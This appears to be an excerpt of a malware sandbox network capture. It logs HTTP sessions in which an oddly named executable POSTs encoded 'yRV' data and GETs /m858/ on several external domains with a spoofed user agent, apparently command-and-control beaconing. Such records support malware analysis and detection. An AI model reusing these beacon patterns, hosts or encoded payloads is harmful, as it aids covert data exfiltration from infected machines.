                                                                                                                      Date: Thu, 07 Dec 2023 14:53:49 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Content-Encoding: gzip
Dec 7, 2023 15:53:49.994918108 CET | 1286 | IN | Data Raw: [continuation of the gzip-compressed response body]
Dec 7, 2023 15:53:49.995007038 CET | 1249 | IN | Data Raw: [continuation of the gzip-compressed response body]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.11 | 49725 | 194.58.112.174 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:52.518884897 CET | 736 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:53:52.806050062 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:52 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.11 | 49726 | 194.58.112.174 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:55.325917959 CET | 1749 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:53:55.607819080 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:55 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.11 | 49727 | 194.58.112.174 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:58.140388012 CET | 443 | OUT | GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=OT9XPYCRU0j98Hg/1uDBlXaBM2XXKmT/I6iFF8QONKz/+dd2eTQvqRBLoPpbyNuYQnsLqtRbnM1ZEfE8nLSuQup3k418CZKp1g== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:53:58.420936108 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:58 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: 2969<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.lets-room.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" rel="nofollow noopener noreferrer" target="_blank">.</a></div><div class="b-page__content-wrapper b-page__cont


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.11 | 49728 | 217.144.107.2 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:54:13.963182926 CET | 701 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.sorenad.com
                                                                                                                      Origin: http://www.sorenad.com
                                                                                                                      Referer: http://www.sorenad.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 4d 4c 34 4a 53 53 57 6c 4e 32 57 48 63 4d 66 58 4c 6e 79 77 4d 42 73 65 4c 4b 67 6e 68 73 4a 58 38 78 4a 47 49 73 45 6d 7a 33 35 65 59 37 7a 4a 57 73 70 58 6a 38 47 37 4a 52 7a 41 39 7a 54 42 4f 43 33 66 68 42 2b 79 53 46 47 76 2f 50 66 49 79 46 35 62 41 64 44 59 38 4f 66 63 42 49 4d 70 38 4a 32 56 44 2f 43 31 6f 37 4b 4a 35 2f 32 39 35 70 39 79 41 59 71 34 38 63 6a 67 48 34 2f 38 53 64 59 76 4f 78 36 63 2b 6b 39 2b 57 45 6a 78 31 5a 61 2f 71 6b 57 7a 55 79 79 79 43 55 53 51 50 46 4a 2f 78 4b 4f 49 59 36 52 34 69 6f 49 62 30 51 3d 3d
                                                                                                                      Data Ascii: yRV=ML4JSSWlN2WHcMfXLnywMBseLKgnhsJX8xJGIsEmz35eY7zJWspXj8G7JRzA9zTBOC3fhB+ySFGv/PfIyF5bAdDY8OfcBIMp8J2VD/C1o7KJ5/295p9yAYq48cjgH4/8SdYvOx6c+k9+WEjx1Za/qkWzUyyyCUSQPFJ/xKOIY6R4ioIb0Q==
Dec 7, 2023 15:54:14.773519993 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 14:54:14 GMT
                                                                                                                      server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.11 | 49729 | 217.144.107.2 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:54:16.805712938 CET | 721 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.sorenad.com
                                                                                                                      Origin: http://www.sorenad.com
                                                                                                                      Referer: http://www.sorenad.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 4d 4c 34 4a 53 53 57 6c 4e 32 57 48 63 73 50 58 49 45 61 77 4c 68 73 42 58 61 67 6e 72 4d 4a 62 38 78 46 47 49 74 51 50 7a 6c 64 65 66 61 44 4a 45 35 64 58 6b 38 47 37 52 68 7a 42 79 54 54 4f 4f 43 36 71 68 41 53 79 53 46 53 76 2f 4c 58 49 79 32 42 61 43 4e 44 61 32 65 66 53 66 34 4d 70 38 4a 32 56 44 2f 47 66 6f 2f 75 4a 35 4f 47 39 72 49 39 31 65 6f 71 37 32 38 6a 67 57 49 2b 31 53 64 59 4e 4f 31 69 6c 2b 6d 46 2b 57 47 4c 78 32 4e 32 38 6b 6b 57 31 4a 69 7a 68 52 52 2f 63 43 79 49 38 75 37 4f 45 62 76 6f 56 75 64 6b 49 7a 75 42 43 52 6a 36 75 65 33 39 4b 5a 36 47 55 43 6f 6f 66 6c 4f 6f 3d
                                                                                                                      Data Ascii: yRV=ML4JSSWlN2WHcsPXIEawLhsBXagnrMJb8xFGItQPzldefaDJE5dXk8G7RhzByTTOOC6qhASySFSv/LXIy2BaCNDa2efSf4Mp8J2VD/Gfo/uJ5OG9rI91eoq728jgWI+1SdYNO1il+mF+WGLx2N28kkW1JizhRR/cCyI8u7OEbvoVudkIzuBCRj6ue39KZ6GUCooflOo=
Dec 7, 2023 15:54:17.610070944 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 14:54:17 GMT
                                                                                                                      server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.11 | 49730 | 217.144.107.2 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:54:19.647546053 CET | 1734 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.sorenad.com
                                                                                                                      Origin: http://www.sorenad.com
                                                                                                                      Referer: http://www.sorenad.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:54:20.451973915 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 14:54:20 GMT
                                                                                                                      server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.11 | 49731 | 217.144.107.2 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:54:22.488482952 CET | 438 | OUT | GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dIPmy2erOJpsQ9g== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.sorenad.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:54:23.241965055 CET | 447 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dIPmy2erOJpsQ9g==
                                                                                                                      content-length: 0
                                                                                                                      date: Thu, 07 Dec 2023 14:54:22 GMT
                                                                                                                      server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.11 | 49732 | 64.190.62.22 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:54:29.096786976 CET | 725 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=Fu9rMOIxR5RRzR7c4XkyaX/TuNuxl7vwPPmiaKDd2vHAiDc1lrVO4YYRPTFlw1jrdVMVSdsL8li7J8IugUCJ8oqDD2lJZ3MDtzTjUxMAMaiZbiLiFKJ/9VVmrgWk+GdI+T7yQYDuItZ0MwJ4qE2GxxPmELyqral9fU7HmC0pkHrBhBlALA==
Dec 7, 2023 15:54:29.340286970 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 14:54:29 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.11 | 49733 | 64.190.62.22 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:54:31.865360022 CET | 745 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=Fu9rMOIxR5RRzyzc6wwyPn/cjdux8rv0PPiiaP6Y2dTAijs1kv5O5YYREzEh6VjedVAnSZkL8hC7J94uhjWO84qNF2lxWXMDtzTjUxIqMbGZHC7iFrJ4w1VlogWkpWdU+T6nQdrAIrd0Mx54rQiF7xOtbbzKl7cYbDi34Hg6qzWet0JTM4QhO7K+U2MUNC8riz+p1AI=
Dec 7, 2023 15:54:32.108922958 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 14:54:31 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.11 | 49734 | 64.190.62.22 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:54:34.630893946 CET | 1758 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:54:34.874718904 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 14:54:34 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      24 | 192.168.2.11 | 49735 | 64.190.62.22 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:54:37.397350073 CET | 446 | OUT | GET /m858/?yRV=IsVLP75BXPV29irb7QUBT0f93P2nzsiWNaG7Z6nH6v/C9T4Z/rVV4+geNHA05yDya3IUff47iHu4NOYvgxXZ16OgIRZyd1QpzQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:54:37.672962904 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Thu, 07 Dec 2023 14:54:37 GMT
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      transfer-encoding: chunked
                                                                                                                      vary: Accept-Encoding
                                                                                                                      x-powered-by: PHP/8.1.17
                                                                                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      pragma: no-cache
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_a9Q6tIE2GsPMW9YmbUF6OLg0v6uRxk7RhICzcqB0tQjcGj1T68EQw1E3f2L3/J4lGWAQHiVtqFAAqhkfszULJg==
                                                                                                                      last-modified: Thu, 07 Dec 2023 14:54:37 GMT
                                                                                                                      x-cache-miss-from: parking-646d69ff84-gr9qk
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_a9Q6tIE2GsPMW9YmbUF6OLg0v6uRxk7RhICzcqB0tQjcGj1T68EQw1E3f2L3/J4lGWAQHiVtqFAAqhkfszULJg==><head><meta charset="utf-8"><title>medical-loan24.live&nbsp;-&nbsp;medical loan24 Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="medical-loan24.live is your first and best source for all of the information youre looking


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      25 | 192.168.2.11 | 49736 | 207.244.126.150 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:54:44.059851885 CET | 728 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Origin: http://www.speedbikesglobal.com
                                                                                                                      Referer: http://www.speedbikesglobal.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=x/Dq0OSjcWbnwZSYl05yv/+K8rQ1/RqsAHFWcoDKsYKB7P5UMhVa8lAHDCExcN5rJBu2wlCuuRBf4I62Bjly0cs5ZduOvj0pL4uAxMsvqsHBRwFl8wHAAPxh357pRapLFAHnh8q9yKIrLBZThT3f8+Zw6rbXn3DDf2W7sU0uDXA2gx88qQ==
                                                                                                                      Dec 7, 2023 15:54:44.221690893 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:54:44 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      26 | 192.168.2.11 | 49737 | 207.244.126.150 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:54:46.839879036 CET | 748 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Origin: http://www.speedbikesglobal.com
                                                                                                                      Referer: http://www.speedbikesglobal.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=x/Dq0OSjcWbnx66Yq3By4v+JlbQ11xqoAHJWcp3jttaB6r9UNgVa9lAHIiE0C95gJBjBwnmuuVpf4IK2BQ911MssANuQhD0pL4uAxM5KqsPBRFNl6RHHefxm257pa6pHFAHVh+eHyIgrLApTmGbQ1+ZynbaIhniuVlSy0kYNHzlTsEQvtrbZcX/SNK50BfTyUywQUBg=
                                                                                                                      Dec 7, 2023 15:54:47.001226902 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:54:46 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      27 | 192.168.2.11 | 49738 | 207.244.126.150 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:54:49.512392044 CET | 1761 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Origin: http://www.speedbikesglobal.com
                                                                                                                      Referer: http://www.speedbikesglobal.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
